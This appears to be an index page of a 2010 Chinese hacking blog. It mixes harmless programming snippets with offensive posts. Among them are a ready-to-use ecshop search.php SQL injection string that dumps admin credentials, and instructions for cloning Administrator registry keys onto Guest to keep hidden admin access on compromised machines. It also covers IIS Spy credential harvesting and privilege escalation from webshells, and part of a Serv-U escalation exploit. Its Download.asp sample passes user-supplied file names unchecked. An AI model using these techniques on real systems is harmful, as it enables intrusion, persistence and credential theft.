程序设计中会经常碰到一种情况,就是事先无法得知用户会需要哪些数据,必须根据用户选择后再从服务器重新提取数据后反馈给用户。比如一简单的情况,用户选择省份以后,我们立即会在市里边将这个省的所有市重新显示出来。这种情况一般需要将整个页面刷新后才可以重新读取,但这样不仅效率不高外,也显得不太优雅。其实用javascript结合微软件的XMLHTTP对象,我们可以不用刷新,“稍稍”的就可以将数据从服务器上读取出来,显得既专业,又高效。 下面我们就以一个验证用户是否被注册的情况来演示这种技术。 '程序设计:环球万维,专业域名注册,虚拟主机服务商 '网址:http://www.netInter.cn '此程序为环球万维原创程序,所以如果您需转载,请注明出处,谢谢。 '以上信息与文章正文是不可分割的一部分,所以如果您要转载本文章,您必须保留以上信息. 1.首先在服务器上建立一个CheckUser.asp文件,用来检测用户是否存在,根据用户是否存在分别反馈0和1 u_name=Request.QueryString("u_name") if u_name 存在 then Response.write "0" else Response.write "1" end if 2.客户端HTML设计: 一、JavaScript代码:
二、HTML表单设计:
经过以上三步,一个不需要页面刷新的数据更新程序就完成了,按此方法,可以实现很多会很酷的应用:) |
VC实现PPPOE拨号
作者:admin 日期:2010-08-02
另外我还发现闪讯拨号用的现成的api,ras函数。这也否定了我以前的一个猜想。我现在强烈感觉到那串加在用户名前面的不明数据就是一串随即数据。ras函数我不熟,网上找了一个简单的pppoe例子,先放着以后说不定用得着。
废话到此结束。
背景:代替手工自动进行PPPOE拨号
相关知识:
主要使用的函数:
The RasDial function establishes a RAS connection between a RAS client and a RAS server. The connection data includes callback and user-authentication information
DWORD RasDial(
__in LPRASDIALEXTENSIONS lpRasDialExtensions,
__in LPCTSTR lpszPhonebook,
__in LPRASDIALPARAMS lpRasDialParams,
__in DWORD dwNotifierType,
__in LPVOID lpvNotifier,
__in LPHRASCONN lphRasConn
);
Return Value
md5 在线破解
作者:admin 日期:2010-07-31
批处理高级教程
作者:admin 日期:2010-07-30
第一章 批处理基础
第一节 常用批处理内部命令简介
1、REM 和 ::
2、ECHO 和 @
3、PAUSE
4、ERRORLEVEL
5、TITLE
6、COLOR
7、mode 配置系统设备
8、GOTO 和 :
9、FIND
10、START
11、assoc 和 ftype
12、pushd 和 popd
13、CALL
14、shift
15、IF
16、setlocal 与 变量延迟
17、ATTRIB 显示或更改文件属性
第二节 常用特殊符号
1、@ 命令行回显屏蔽符
2、% 批处理变量引导符
3、> 重定向符
4、>> 重定向符
5、<、>&、<& 重定向符
6、| 命令管道符
7、^ 转义字符
8、& 组合命令
9、&& 组合命令
10、|| 组合命令 11、"" 字符串界定符
12、, 逗号
13、; 分号
14、() 括号
15、! 感叹号
Tags: 批处理
lnk漏洞利用工具
作者:admin 日期:2010-07-28
账户克隆原理介绍
作者:admin 日期:2010-07-27
相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样
那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。
我只讲述下克隆的原理和方法。希望对大家有所启发。
原理:我们的帐户在注册表里都有他相应的键值,具体在 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ”administrator 的
项为 “000001F4”下面有 2个二进制值 一个 是“F”一个是“V”。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,
克隆其他用户方法相同。Guest的项为 “000001F5”。其他用户所对应的项可以从 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\
Users\Names”下查看。我们所要做的就是把“1F4”下的“F”和“V”值复制到“1F5”下的对应值里。这就是所说的克隆帐户。
1 简单克隆:
a,原理:只复制“F”值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方便些。如果肉鸡的管理员不是
太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就是说你在系统里的
文件“C:\Documents and Settings\Administrator”和admin是一样的。而非以前的“C:\Documents and Settings\Guest”。但是在
“query user”和“终端服务管理器”里面你所登陆的用户还是“Guest”,还有就是用命令“net localgroup administrators”还是可以
看出Guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出Guest用户有什么问题。
防止aspx木马的IIS SPY变态功能
作者:admin 日期:2010-07-23
mylcx 穿墙版
作者:admin 日期:2010-07-18
写的很匆忙很乱,可能有些地方会有问题。
说一下用法吧
-slave 和-listen 两个参数同lcx就不多说了,或者参考我的另一偏文章
提权之iis spy利用
作者:admin 日期:2010-07-17
或许用过aspx大马的人知道一般aspx大马都有一个功能叫做"iis spy",它的作用就是列出服务器上面所有网站的信息,包括用户名,密码,路径以及捆绑的域名。
一般我们要是做旁注的时候只需要看目标网站在哪个路径下面然后尝试跳转过去或者cacls改下权限(我用的前一个服务器竟然就有这样的问题,直接cacls就可以修改权限,我自己给自己送了个webshell竟然还可以旁别人的,着实被恶心一下。)。
而且很多情况下,iis密码是乱码的,这我没有仔细研究过是不是随即产生的。但要是密码不是乱码的话你就要注意了,说不定这个密码和用户名就可以用来登陆ftp。不妨试下。上次一个shell把我深深地雷到了,管理员的密码竟然也这样暴露在阳光下。操到3389里登陆,提权都免了。
iis spy的作用主要就这两个了。
base64编码/解码函数 c语言
作者:admin 日期:2010-07-15
CreateProcess实例和TerminateProcess实例
作者:admin 日期:2010-07-15
这个实例编写了两个函数,分别叫做shell和kill(用到的api分别是CreateProcess和,TerminateProcess).shell函数的参数是一个你要执行的可执行文件的名称,当然只要文文件格式符合exe的pe格式就可以(比如你可以把一个calc.exe改名为calc.jpg用这个函数照样可以执行),然后他返回新创建的这个进程的pid。
第二个函数的作用是结束一个进程,你只须传入这个进程的pid即可。若成功返回true, 否则返回false。
很简单吧。
#include <windows.h>
serv-u7,8,9本地提权exp
作者:admin 日期:2010-07-14
serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
''----------自定义参数开始-----------
中转注入原理
作者:admin 日期:2010-07-14
呵呵,又来骗流量了。说起来真的是孤陋寡闻了,我听说中转注入这个方法大概是在几个月前,但这位寂寞的刺猬大侠好象在07年或者更早就弄出了这东西。刚听说中转注入的时候觉得很好奇,以为又出什么新招了,看了代码才知道原来所谓的中转注入其实就是传说当中的cookie注入。但cookie注入很烦琐,而且基本上只能用手工,所以我觉得这个中转注入的想法真的很巧妙,巧妙地把原来无法放阿D或者明小子上注的cookie中转到了url上面。
既然骗了人来这里看我写的这个无聊的文章,那我也稍微负点责好了,简单的说下原理。其实了解cookie注入的同学应该都明白的。
我不知道大家遇到cookie注入的时候是怎么注的,反正我是用的明小子里面带的浏览器,那个有个修改cookie的功能。然后再结合一下站长工具里面的一个escape加密工具就可以注入了。要是能直接暴出用户密码当然最好,要是暴不出真的就是一件非常烦琐的事情了。
比如有这么一个cookie注入点
Tags: 注入
js实现无刷新更新数据
作者:admin 日期:2010-07-14
360漏洞利用工具
作者:admin 日期:2010-07-12
宽字符处理函数函数与普通函数对照表
作者:admin 日期:2010-07-10
ecshop search.php的注入漏洞-爆出管理员密码!
作者:admin 日期:2010-07-06
ecshop search.php的注入漏洞-爆出管理员密码!
利用语句:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code
解决方案
search.php
大概300 源
if (is_not_null($val) )
修改为
if (is_not_null($val) && is_numeric($key))
asp大马
作者:admin 日期:2010-07-03
ASP下载功能实现
作者:admin 日期:2010-06-21
将下边的文件保存为Download.asp就可以了,然后根据需要传要下载的文件过来就可以了。
使用格式:Download.asp?FileName=要下载的文件名
注意:FileName后边只能是要下载的文件名,文件所在的路径要在源代码里设置FilePath变量。当然这个变量也可以动态设置,方法两种:一、也是使用URL传递过来;二、从数据库中读去。至于如何设置,根据需要了。
2 Dim Stream
3 Dim Contents
4 Dim FileName
5 Dim FileExt
6 Dim FilePath
7
8 Rem 设置下载文件所在的路径,默认空,要下载的文件与当前文件在同一目录
9 FilePath = ""
10
11 Const adTypeBinary = 1
12 FileName = Request.QueryString("FileName")
13 if FileName = "" Then
14 Response.Write "无效文件名."
15 Response.End
16 End if
17
18 Rem 下面是不希望下载的文件
19 FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
20 Select Case UCase(FileExt)
21 Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
22 Response.Write "受保护文件,不能下载."
23 Response.End
24 End Select
25
26 Rem 下载这个文件
27 Response.Clear
28 Response.ContentType = "application/octet-stream"
29 Response.AddHeader "content-disposition", "attachment; filename=" & FileName
30 Set Stream = server.CreateObject("ADODB.Stream")
31 Stream.Type = adTypeBinary
32 Stream.Open
33 Stream.LoadFromFile Server.MapPath(FileName)
34 While Not Stream.EOS
35 Response.BinaryWrite Stream.Read(1024 * 64)
36 Wend
37 Stream.Close
38 Set Stream = Nothing
39 Response.Flush
40 Response.End
41 %>